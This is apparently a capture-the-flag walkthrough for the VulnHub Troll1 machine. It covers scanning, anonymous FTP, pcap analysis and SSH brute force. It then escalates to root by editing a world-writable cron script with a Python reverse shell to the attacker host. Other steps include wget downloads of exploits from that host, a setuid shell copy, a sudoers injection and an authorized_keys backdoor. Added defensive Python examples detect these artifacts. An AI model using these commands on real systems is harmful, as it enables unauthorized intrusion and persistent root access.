vulnhub-troll1
forg12

Overview

Information gathering

Host discovery

nmap -sP 192.168.2.0/24

Nmap scan report for 192.168.2.133
Host is up (0.012s latency).

Port scan

nmap -p- 192.168.2.133
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.133
Host is up (0.024s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
sudo nmap -p 21,22,80 -A -T4 -sS 192.168.2.133
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.2.133
Host is up (0.046s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.2.136
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 50:2B:73:A0:02:39 (Tenda Technology,Ltd.Dongguan branch)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 46.43 ms 192.168.2.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.02 seconds

Directory enumeration

dirsearch -u http://192.168.2.133/ -x 403 -r


dirsearch turned up nothing useful.

Anonymous FTP

The service scan above shows that the FTP server allows anonymous login and that a file named lol.pcap is present.

ftp 192.168.2.133


Wireshark

Follow the TCP streams in Wireshark.


TCP streams 1 and 3 both show a file named secret_stuff.txt; the contents of TCP stream 2 are:

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

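The same stream extraction can be done without Wireshark. The following Python is an added example, not part of the original writeup: a minimal reader for classic libpcap files that follows TCP streams by grouping payload segments per conversation, as Wireshark's Follow TCP Stream does. The capture it parses is constructed inline (an FTP-style exchange similar to the one in lol.pcap, not the real file); it assumes Ethernet link type and IPv4/TCP only, does not verify checksums or reorder segments, and does not read pcapng.

```python
"""Added example (not from the original writeup): a minimal libpcap reader that
follows TCP streams the way Wireshark's "Follow TCP Stream" does.
Assumptions: classic pcap (not pcapng), Ethernet link type, IPv4/TCP only;
segments are concatenated in capture order and checksums are not verified."""
import struct
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4   # magic of a little-endian pcap header
PCAP_MAGIC_BE = 0xD4C3B2A1   # same magic as read from a big-endian writer
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def _ip(b):
    return ".".join(str(x) for x in b)


def parse_frame(frame):
    """Return ((src_ip, sport), (dst_ip, dport), payload) for an Ethernet/IPv4/TCP
    frame, or None for anything else (ARP, IPv6, UDP, truncated frames)."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ver_ihl, _, total_len, _, _, _, proto, _, src, dst = struct.unpack_from("!BBHHHBBH4s4s", ip)
    if ver_ihl >> 4 != 4 or proto != IPPROTO_TCP:
        return None
    ihl = (ver_ihl & 0x0F) * 4
    tcp = ip[ihl:total_len]
    if len(tcp) < 20:
        return None
    sport, dport, _, _, off_flags = struct.unpack_from("!HHIIB", tcp)
    data_off = (off_flags >> 4) * 4
    return (_ip(src), sport), (_ip(dst), dport), tcp[data_off:]


def follow_tcp_streams(pcap_bytes):
    """Group TCP payload segments by conversation.
    Returns {stream_key: [(src, dst, payload), ...]}; stream_key is the sorted
    pair of endpoints, so both directions of a connection share one stream."""
    magic = struct.unpack_from("<I", pcap_bytes)[0]
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == PCAP_MAGIC_BE:
        endian = ">"
    else:
        raise ValueError("not a classic libpcap file")
    if struct.unpack_from(endian + "I", pcap_bytes, 20)[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    streams = defaultdict(list)
    offset = 24                                   # skip the 24-byte global header
    while offset + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack_from(endian + "IIII", pcap_bytes, offset)
        offset += 16
        parsed = parse_frame(pcap_bytes[offset:offset + incl_len])
        offset += incl_len
        if parsed and parsed[2]:                  # drop handshake / ACK-only segments
            src, dst, payload = parsed
            streams[tuple(sorted((src, dst)))].append((src, dst, payload))
    return dict(streams)


def stream_text(chunks):
    """Concatenate a stream's payloads into text, like the Follow-stream window."""
    return b"".join(p for _, _, p in chunks).decode("latin-1")


def _tcp_frame(src, dst, payload):
    """Constructed Ethernet/IPv4/TCP frame for the sample capture (checksums zero)."""
    (sip, sport), (dip, dport) = src, dst
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in sip.split(".")),
                     bytes(int(o) for o in dip.split("."))) + tcp
    return b"\x02" * 6 + b"\x04" * 6 + struct.pack("!H", ETHERTYPE_IPV4) + ip


def build_sample_pcap():
    """Constructed capture: an FTP control channel plus a data channel carrying a
    taunt similar to the one in the writeup. This is not the real lol.pcap."""
    client, server = ("10.0.0.5", 40001), ("10.0.0.9", 21)
    data_client, data_server = ("10.0.0.5", 40002), ("10.0.0.9", 20)
    frames = [
        _tcp_frame(client, server, b"USER anonymous\r\n"),
        _tcp_frame(server, client, b"230 Login successful.\r\n"),
        _tcp_frame(client, server, b"RETR secret_stuff.txt\r\n"),
        _tcp_frame(data_server, data_client, b"Well, well, well, you almost found the "),
        _tcp_frame(data_server, data_client, b"sup3rs3cr3tdirlol :-P\r\n"),
    ]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1660000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for n, (key, chunks) in enumerate(follow_tcp_streams(build_sample_pcap()).items()):
        print(f"tcp.stream {n}: {key[0]} <-> {key[1]}")
        print(stream_text(chunks))
```

For a real capture, pass open(path, "rb").read() to follow_tcp_streams(). Because the stream key is the sorted endpoint pair, the request and the response of one connection end up in a single stream, which is what makes a message split across several segments readable as one text.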
secret_stuff.txt
sup3rs3cr3tdirlol

sup3rs3cr3tdirlol

secret_stuff.txt was not found in either the web root or the /secret directory, but the sup3rs3cr3tdirlol path does exist under the web root.

http://192.168.2.133/sup3rs3cr3tdirlol/


Download the file and inspect its printable strings with strings.

wget http://192.168.2.133/sup3rs3cr3tdirlol/roflmao 
strings roflmao


Find address 0x0856BF to proceed

0x0856BF


Collected information

good_luck
which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux
usmc8892
blawrg
wytshadow
vis1t0r
overflow
this_folder_contains_the_password
Pass.txt
Good_job_:)

Exploitation

SSH brute force

Put the collected strings into dic.txt and use that file as both the user list and the password list to brute-force the SSH login.

hydra -L dic.txt -P dic.txt ssh://192.168.2.133:22

[22][ssh] host: 192.168.2.133 login: overflow password: Pass.txt
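From the server side a run like this leaves a very recognisable trace. The following Python is an added example, not from the writeup: it parses OpenSSH's default syslog lines and reports sources with a burst of failed logins inside a short window, and separately whether an accepted login from the same source followed the failures, which is the signature of a wordlist attack that succeeded. The log lines are constructed to resemble what this hydra run would produce; the hostname, PIDs and client ports are made up.

```python
"""Added example (not from the writeup): detecting an SSH password-guessing run
from the server's auth log. Assumption: OpenSSH logging to syslog in its default
format (Debian/Ubuntu /var/log/auth.log); the log lines below are constructed."""
import re
from collections import defaultdict
from datetime import datetime

SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
)

# Constructed sample: a guessing run from one host (user names taken from the
# wordlist the writeup collected), then a success, plus one unrelated failure.
SAMPLE_AUTH_LOG = """\
Aug 10 10:02:11 troll sshd[1401]: Failed password for invalid user maleus from 192.168.2.136 port 51200 ssh2
Aug 10 10:02:11 troll sshd[1403]: Failed password for invalid user felux from 192.168.2.136 port 51202 ssh2
Aug 10 10:02:12 troll sshd[1405]: Failed password for invalid user genphlux from 192.168.2.136 port 51204 ssh2
Aug 10 10:02:12 troll sshd[1407]: Failed password for invalid user wytshadow from 192.168.2.136 port 51206 ssh2
Aug 10 10:02:13 troll sshd[1409]: Failed password for overflow from 192.168.2.136 port 51208 ssh2
Aug 10 10:02:13 troll sshd[1411]: Failed password for overflow from 192.168.2.136 port 51210 ssh2
Aug 10 10:02:14 troll sshd[1413]: Accepted password for overflow from 192.168.2.136 port 51212 ssh2
Aug 10 10:30:00 troll sshd[1500]: Failed password for overflow from 192.168.2.50 port 40000 ssh2
Aug 10 10:31:00 troll sshd[1502]: Accepted publickey for overflow from 192.168.2.50 port 40002 ssh2
"""


def parse_sshd_events(lines, year=2022):
    """Yield (timestamp, result, user, ip) per sshd auth line; other lines are skipped.
    Syslog timestamps carry no year, so the caller supplies it."""
    for line in lines:
        m = SSHD_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def _max_in_window(times, window_s):
    """Largest number of events inside any window_s-second span (two-pointer sweep)."""
    times = sorted(times)
    best = lo = 0
    for hi, t in enumerate(times):
        while (t - times[lo]).total_seconds() > window_s:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def find_bruteforce(lines, threshold=5, window_s=60):
    """Return {ip: summary} for sources with >= threshold failures within window_s
    seconds. A success from the same source after its last failure is listed under
    success_after_failures, the sign that the guessing run worked."""
    fails = defaultdict(list)
    users = defaultdict(set)
    successes = defaultdict(list)
    for ts, result, user, ip in parse_sshd_events(lines):
        if result == "Failed":
            fails[ip].append(ts)
            users[ip].add(user)
        else:
            successes[ip].append((ts, user))
    report = {}
    for ip, times in fails.items():
        burst = _max_in_window(times, window_s)
        if burst < threshold:
            continue
        last_fail = max(times)
        report[ip] = {
            "failures": len(times),
            "max_in_window": burst,
            "usernames_tried": sorted(users[ip]),
            "success_after_failures": [u for t, u in successes[ip] if t > last_fail],
        }
    return report


if __name__ == "__main__":
    for ip, summary in find_bruteforce(SAMPLE_AUTH_LOG.splitlines()).items():
        print(ip, summary)
```

Feed it the lines of /var/log/auth.log. The two-pointer window matters because a slow guessing run spread over days and a hydra burst look different in rate even when the total count is similar; the threshold and window are the knobs to tune per host. The fix for the weakness this box demonstrates is the usual one: disable password authentication on sshd in favour of keys, and ban or rate-limit a source after a handful of failures.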

Privilege escalation

wget http://192.168.2.136:1111/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
wget http://192.168.2.136:1111/40839.c
gcc -pthread 40839.c -o dirty -lcrypt


wget http://192.168.2.136:1111/a.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow a.cpp -lutil

ofs

searchsploit 37292
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
wget http://192.168.2.136:1111/37292.c
gcc 37292.c -o ofs
./ofs


Scheduled task running a Python script


Among the writable files reported by linpeas is the Python script that the scheduled task runs. Modifying this script is what escalates privileges.
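The weakness exploited here is a scheduled job that executes a script an unprivileged account can edit. The following Python is an added example, not part of the writeup or of linpeas: it parses /etc/crontab-style entries, works out which file each job actually executes (the script handed to an interpreter, or the command path itself), and reports targets that are world- or group-writable, owned by someone other than root while the job runs as root, missing, or sitting in a world-writable directory. The crontab and the files it checks are constructed in a temporary directory by demo(); the hypothetical paths and schedules in it are not from the box.

```python
"""Added example (not from the writeup): audit cron entries for scripts that
someone other than the job's owner can change. Assumptions: /etc/crontab layout
(a user column after the five time fields); the sample crontab and files are
constructed in a temporary directory."""
import os
import re
import shlex
import stat
import tempfile

INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3", "perl", "ruby", "php"}


def script_path(command):
    """Return the file a cron command really executes: the script handed to an
    interpreter ('python /opt/job.py'), otherwise the first path-like token."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return None
    for i, tok in enumerate(argv):
        if os.path.basename(tok) in INTERPRETERS:
            return next((a for a in argv[i + 1:] if not a.startswith("-")), None)
        if "/" in tok:
            return tok
    return None


def parse_system_crontab(lines):
    """Yield (user, command) from /etc/crontab text, skipping comments, blank
    lines and VAR=value assignments; @reboot-style schedules are handled too."""
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
            continue
        is_special = line.startswith("@")
        fields = line.split(None, 1 if is_special else 5)
        if len(fields) != (2 if is_special else 6):
            continue
        user_cmd = fields[-1].split(None, 1)
        if len(user_cmd) == 2:
            yield user_cmd[0], user_cmd[1]


def audit_cron(lines):
    """Report cron entries whose target file could be altered by someone other
    than the account the job runs as. Each finding lists its reasons."""
    findings = []
    for user, command in parse_system_crontab(lines):
        path = script_path(command)
        if not path:
            continue
        reasons = []
        try:
            st = os.stat(path)
        except OSError:
            reasons.append("target missing: check who may create it")
        else:
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                reasons.append(f"group-writable (gid {st.st_gid})")
            if user == "root" and st.st_uid != 0:
                reasons.append(f"runs as root but owned by uid {st.st_uid}")
            parent = os.stat(os.path.dirname(os.path.abspath(path)))
            if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
                reasons.append("parent directory world-writable, file can be replaced")
        if reasons:
            findings.append({"user": user, "command": command, "path": path, "reasons": reasons})
    return findings


def demo():
    """Constructed crontab in a temp dir: one root job on a world-writable
    script (the Troll-style bug), one on a properly protected script, and one
    whose target does not exist. Returns (findings, bad_path, good_path)."""
    d = tempfile.mkdtemp()
    bad, good = os.path.join(d, "cleaner.py"), os.path.join(d, "backup.sh")
    for p in (bad, good):
        with open(p, "w") as f:
            f.write("# placeholder script\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    crontab = [
        "SHELL=/bin/sh",
        "# m h dom mon dow user command",
        f"*/2 * * * * root /usr/bin/python {shlex.quote(bad)}",
        f"0 3 * * * root /bin/sh {shlex.quote(good)}",
        "@reboot root /usr/bin/does-not-exist",
    ]
    return audit_cron(crontab), bad, good


if __name__ == "__main__":
    for finding in demo()[0]:
        print(f"[{finding['user']}] {finding['command']}")
        print(f"    -> {finding['path']}: {', '.join(finding['reasons'])}")
```

To run it against a host, pass the lines of /etc/crontab and of each file in /etc/cron.d to audit_cron(). The ownership check is deliberately reported even when the file is not writable by others, because a root job executing a file owned by a regular user is exactly the situation that turned a low-privilege shell into root here.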

Reverse shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.2.136",2233))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);


Running system commands with os.system

Creating a setuid-root program

os.system('cp /bin/sh /tmp/exp')
os.system('chmod u+s /tmp/exp')
$ ./exp
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# whoami
root


Adding the user to /etc/sudoers

Adding the overflow user to the sudoers file allows sudo su to root.

os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers')


Writing id_rsa.pub into authorized_keys

os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa *" >> /root/.ssh/authorized_keys')
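Each of the three steps above leaves an artifact a defender can look for. The following Python is an added example, not from the writeup: it lists setuid/setgid files under given directories (a setuid copy of a shell in /tmp stands out immediately), extracts sudoers rules that grant a user ALL commands, and prints the SHA256 fingerprint and comment of every key in an authorized_keys file so an unexpected entry can be spotted. demo() builds a constructed temporary tree with one instance of each; the sudoers and authorized_keys syntax assumed is the standard one, and the key material is fake.

```python
"""Added example (not from the writeup): spot the persistence artifacts of the
escalation above: a setuid binary in a temp directory, a new full sudoers grant,
and an added authorized_keys entry. The sample tree is constructed in a temp
directory, nothing is read from the live system."""
import base64
import hashlib
import os
import re
import stat
import tempfile

# user  host=(runas) [tags:] commands   (groups start with %, excluded on purpose)
SUDO_RULE = re.compile(r"^(?P<who>[^\s#%]+)\s+\S+\s*=\s*(?:\([^)]*\))?\s*(?P<cmds>.+)$")


def find_setuid(roots):
    """Return (path, owner uid, mode) for regular files with setuid/setgid under roots."""
    hits = []
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                p = os.path.join(dirpath, name)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                    hits.append((p, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def sudoers_full_grants(lines):
    """Return user names (not %groups) whose rule lets them run ALL commands,
    with or without NOPASSWD-style tags."""
    users = []
    for raw in lines:
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE.match(line)
        if m and m["cmds"].split(":")[-1].strip() == "ALL":
            users.append(m["who"])
    return users


def authorized_keys(path):
    """Return (key type, OpenSSH-style SHA256 fingerprint, comment) per key line."""
    out = []
    with open(path) as f:
        for line in f:
            parts = line.split()
            if len(parts) < 2 or parts[0].startswith("#"):
                continue
            digest = hashlib.sha256(base64.b64decode(parts[1])).digest()
            fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
            out.append((parts[0], fp, " ".join(parts[2:])))
    return out


def demo():
    """Constructed tree: a tmp dir holding a setuid file, a sudoers file with an
    appended grant, and an authorized_keys file with one fake key."""
    d = tempfile.mkdtemp()
    tmp = os.path.join(d, "tmp")
    os.makedirs(tmp)
    exp = os.path.join(tmp, "exp")
    with open(exp, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(exp, 0o4755)        # what chmod u+s leaves on a 755 copy of a shell
    sudoers = ["Defaults env_reset", "root ALL=(ALL:ALL) ALL",
               "%sudo ALL=(ALL:ALL) ALL", "overflow ALL=(ALL) ALL"]
    keyfile = os.path.join(d, "authorized_keys")
    fake_blob = base64.b64encode(b"constructed-key-material-not-a-real-key").decode()
    with open(keyfile, "w") as f:
        f.write(f"ssh-rsa {fake_blob} added-key@example\n")
    return {
        "setuid": find_setuid([tmp]),
        "sudo_users": sudoers_full_grants(sudoers),
        "keys": authorized_keys(keyfile),
    }


if __name__ == "__main__":
    for kind, value in demo().items():
        print(kind, value)
```

On a real host, point find_setuid() at /tmp, /var/tmp, /dev/shm and /home, read /etc/sudoers together with /etc/sudoers.d/*, and compare the fingerprints from /root/.ssh/authorized_keys with ssh-keygen -lf output for the keys that are supposed to be there. Mounting temp directories nosuid prevents the setuid copy from working at all, which is the cheapest fix for the first of the three artifacts.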


flag

# cat proof.txt
Good job, you did it!


702a8c18d29c6f3ca0d99ef5712bfbdc
